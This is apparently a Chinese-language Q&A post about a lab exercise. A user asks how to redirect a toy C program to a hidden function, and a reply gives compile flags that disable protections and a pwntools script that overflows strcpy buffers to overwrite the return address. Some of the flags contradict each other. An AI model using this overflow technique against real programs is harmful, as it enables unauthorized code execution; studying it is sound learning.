不會使用gdb對return address做更改
希望程式最後能導到myprivatetest()
以下為程式碼:
#include <stdio.h>
#include <string.h>
int UPtest(char *, char *, char *);
void myprivatetest(void);
int main(int argc, char**argv){
if(UPtest(argv[1], argv[2], argv[3])){
printf("Access granted...\n");
} else {
printf("Wrong username and password!!!!\n");
}
return 0;
}
int UPtest(char *a1 , char *a2, char *a3){
char Uid[29], Uname[27], Upass[72];
strcpy(Uid, a1);
strcpy(Uname, a2);
strcpy(Upass, a3);
if(!strcmp(Uname, "Admin") && !strcmp(Upass, "PassAd007"))
return 1;
else
return 0;
}
void myprivatetest(){
printf("This is test code to run other system program.\n");
system("/usr/bin/xeyes");
}
看起來你想要通過 buffer overflow 通過覆蓋 return address 去跳轉到 myprivatetest,想法上應該是蓋掉 rip 暫存器就可以了,我先用 gdb 找到的 myprivatetest 的記憶體地址,這個地址就是要放到 rip 暫存器裡面的值,使用以下指令編譯
all:
gcc -o test test.c -fno-stack-protector -no-pie -z execstack -z noexecstack -z norelro -z now -z relro
接著使用以下腳本
import subprocess
from pwn import *
from pwnlib.tubes.process import *
target = b'\xc5\x12@'
print(target)
arg1 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"
arg2 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJKKKKLLLLMMMMOOOOPPPPQQQQRRRRSSSS" + target
arg3 = b"AAAABBBBCCCCDDDDEEEEFFFFGGGGHHHHIIIIJJJJ"
args = ["gdb", "-args", "test", arg1, arg2, arg3]
context.terminal = ['tmux','splitw','-h']
subprocess.run(args)
效果為以下展示
希望有幫到~